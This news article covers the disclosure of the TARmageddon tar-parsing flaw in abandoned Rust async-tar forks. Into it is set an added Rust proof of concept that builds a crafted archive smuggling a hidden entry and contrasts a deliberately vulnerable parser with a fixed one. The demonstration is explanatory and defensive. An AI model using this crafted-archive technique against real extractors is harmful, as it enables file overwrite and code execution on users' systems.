Researchers uncover remote code execution flaw in abandoned Rust code library

Security specialists at Edera discovered and disclosed a high-severity vulnerability in early, since-abandoned code for an open-source async tar archive library for the Rust programming language.
Researchers warned that exploitation, which allows remote code execution, could have a major impact because the code has been widely forked and there is little visibility into where it is used.
“Given its presence in critical, widely-deployed tools like the uv package manager, the potential impact on build systems and production environments across many companies is substantial,” Alex Zenla, chief technology officer and co-founder at Edera, told CyberScoop in an email.
The boundary-parsing vulnerability, CVE-2025-62518, which has a CVSS score of 8.1, affects the async-tar Rust library and its many forks, including tokio-tar, astral-tokio-tar and krata-tokio-tar, as well as downstream consumers such as the Python package manager uv, testcontainers and wasmCloud. The most popular fork, tokio-tar, has more than 5 million downloads on crates.io and is no longer maintained, according to Edera.
“This vulnerability is a textbook case of the open-source abandonware crisis. The original bug was introduced in an early version of the code that was then repeatedly forked as the original project became unmaintained,” Zenla said.
“The bug was replicated across a deep lineage of these forks,” she added. “When one project stops maintaining code, the bug gets inherited by the entire downstream family, creating a systemic risk that’s incredibly difficult to track and patch efficiently.”
Edera discovered the vulnerability during a development push on its internal platforms Aug. 21. The cybersecurity company created patches the next day and worked to get the fixes into as many active forks and open-source projects as possible before it publicly disclosed the defect Tuesday.
Zenla said tokio-tar and its forks are the foundation for async archive processing across the Rust ecosystem. These tar archives are fundamental for distribution, presenting a vast scope of potential impact, she added.
“The most concerning part is the unawareness,” Zenla said. “This vulnerable code is often an indirect dependency, buried deep in a build tool or container pipeline. Most end-users or businesses don’t even know they are running it, which is why public disclosure is a critical remediation step.”
Attackers can exploit the vulnerability to overwrite files and thereby achieve remote code execution, according to Edera. The defect is not a complex memory-corruption issue but a logic flaw, and it is considered easy to exploit, Zenla said.
Rust is widely regarded as a more secure programming language because safe Rust rules out the classes of memory-safety vulnerabilities that are common in C and C++. Yet CVE-2025-62518, which Edera dubbed “TARmageddon,” shows that no language is completely secure and that safer languages remain susceptible to human error in program logic, Zenla said.
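The article describes the defect only as a boundary-parsing logic flaw. Edera's published advisory describes the root cause as a size mismatch between a PAX extended header and the ustar header that follows it: the parser takes the entry's content size from the PAX `size` record but advances the stream by the ustar size field, so when the ustar field says 0 the entry's body is re-parsed as further tar headers and attacker-chosen entries are "smuggled" into the extraction. The following is an added example, written for this page and not code from async-tar, tokio-tar or any of their forks. It is a deliberately minimal tar walker with a `fixed` switch that reproduces that class of bug next to the corrected behaviour, run against a constructed archive (the entry names `outer.bin`, `smuggled.txt` and `notes.txt` are made up for the demonstration). It uses only the Rust standard library, and nothing in it reaches the filesystem; it lists entries rather than extracting them.

```rust
// Added example modelling a PAX/ustar size-mismatch boundary bug in a tar walker.
// Not code from async-tar/tokio-tar; a simplified stand-alone reimplementation.

const BLOCK: usize = 512;

/// Build one 512-byte ustar header. `typeflag` is b'0' (regular file) or b'x' (PAX header).
fn header(name: &str, size: u64, typeflag: u8) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[100..107].copy_from_slice(b"0000644"); // mode
    h[124..135].copy_from_slice(format!("{:011o}", size).as_bytes()); // size, octal
    h[156] = typeflag;
    h[257..263].copy_from_slice(b"ustar\0");
    h[263..265].copy_from_slice(b"00");
    // Checksum is computed with the checksum field itself counted as eight spaces.
    h[148..156].copy_from_slice(b"        ");
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..155].copy_from_slice(format!("{:06o}\0", sum).as_bytes());
    h
}

/// Pad data to a whole number of 512-byte blocks.
fn pad(mut data: Vec<u8>) -> Vec<u8> {
    let rem = data.len() % BLOCK;
    if rem != 0 {
        data.resize(data.len() + BLOCK - rem, 0);
    }
    data
}

fn round_up(n: usize) -> usize {
    (n + BLOCK - 1) / BLOCK * BLOCK
}

/// NUL-terminated field to String.
fn cstr(b: &[u8]) -> String {
    let end = b.iter().position(|&c| c == 0).unwrap_or(b.len());
    String::from_utf8_lossy(&b[..end]).into_owned()
}

/// One PAX record, "<len> key=value\n", where <len> counts the whole record.
fn pax_record(key: &str, value: &str) -> Vec<u8> {
    let body = format!(" {}={}\n", key, value);
    let mut len = body.len() + 1;
    while len.to_string().len() + body.len() != len {
        len = len.to_string().len() + body.len();
    }
    format!("{}{}", len, body).into_bytes()
}

/// Constructed malicious archive (assumption for the demo): the ustar size field
/// of "outer.bin" claims 0 bytes, a PAX header claims the real body size, and that
/// body is itself a complete tar entry named "smuggled.txt".
fn build_poc() -> Vec<u8> {
    let mut inner = header("smuggled.txt", 5, b'0').to_vec();
    inner.extend_from_slice(b"hello");
    let inner = pad(inner);
    let pax = pax_record("size", &inner.len().to_string());
    let mut tar = Vec::new();
    tar.extend_from_slice(&header("./PaxHeaders/outer.bin", pax.len() as u64, b'x'));
    tar.extend(pad(pax));
    tar.extend_from_slice(&header("outer.bin", 0, b'0')); // ustar size lies: 0
    tar.extend(inner); // the real body, per the PAX size
    tar.resize(tar.len() + 2 * BLOCK, 0); // end-of-archive marker
    tar
}

/// Constructed ordinary archive with one honest entry, to show the fix is behaviour-preserving.
fn build_benign() -> Vec<u8> {
    let mut tar = header("notes.txt", 5, b'0').to_vec();
    tar.extend_from_slice(b"hello");
    let mut tar = pad(tar);
    tar.resize(tar.len() + 2 * BLOCK, 0);
    tar
}

/// Walk the archive and return (name, size) for every regular entry.
/// `fixed == false` reproduces the boundary bug: the content size comes from the
/// PAX header, but the cursor is advanced by the ustar size field instead.
fn list_entries(archive: &[u8], fixed: bool) -> Vec<(String, u64)> {
    let mut out = Vec::new();
    let mut pos = 0;
    let mut pax_size: Option<u64> = None;
    while pos + BLOCK <= archive.len() {
        let h = &archive[pos..pos + BLOCK];
        if h.iter().all(|&b| b == 0) {
            break; // end-of-archive
        }
        let name = cstr(&h[..100]);
        let ustar_size = u64::from_str_radix(cstr(&h[124..136]).trim(), 8).unwrap_or(0);
        pos += BLOCK;
        if h[156] == b'x' {
            // PAX extended header: records override fields of the *next* header.
            let end = (pos + ustar_size as usize).min(archive.len());
            for rec in String::from_utf8_lossy(&archive[pos..end]).lines() {
                if let Some(v) = rec.splitn(2, ' ').nth(1).and_then(|kv| kv.strip_prefix("size=")) {
                    pax_size = v.parse().ok();
                }
            }
            pos += round_up(ustar_size as usize);
            continue;
        }
        let content_size = pax_size.take().unwrap_or(ustar_size);
        out.push((name, content_size));
        // Bug: advancing by the ustar field (0) leaves the cursor at the start of the
        // body, so the body's bytes are parsed as the next header. Fix: advance by the
        // same size that was used for the content.
        let advance = if fixed { content_size } else { ustar_size };
        pos += round_up(advance as usize);
    }
    out
}

fn main() {
    let poc = build_poc();
    println!("vulnerable: {:?}", list_entries(&poc, false));
    println!("fixed:      {:?}", list_entries(&poc, true));
}
```

Against the constructed archive the vulnerable walk reports two entries, `outer.bin` and the smuggled `smuggled.txt`, while the fixed walk reports only `outer.bin`; on the honest archive both walks agree. In a real extractor the second, smuggled entry is what gets written to disk with an attacker-chosen name, which is the file-overwrite primitive the article describes, and none of this involves unsafe code, which is why memory safety offers no protection here.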
The defect also serves as another reminder of the risks lurking in open-source code, particularly when the chain of responsibility breaks as original versions are abandoned or no longer maintained.
“This meant we couldn’t just submit one patch upstream. We had to engage in a difficult, decentralized disclosure — tracking down and coordinating with multiple active forks and downstream consumers to ensure the patch was applied everywhere,” Zenla said.
“When a project is truly abandoned, responsibility becomes a messy, manual, and highly inefficient process for the ecosystem to resolve.”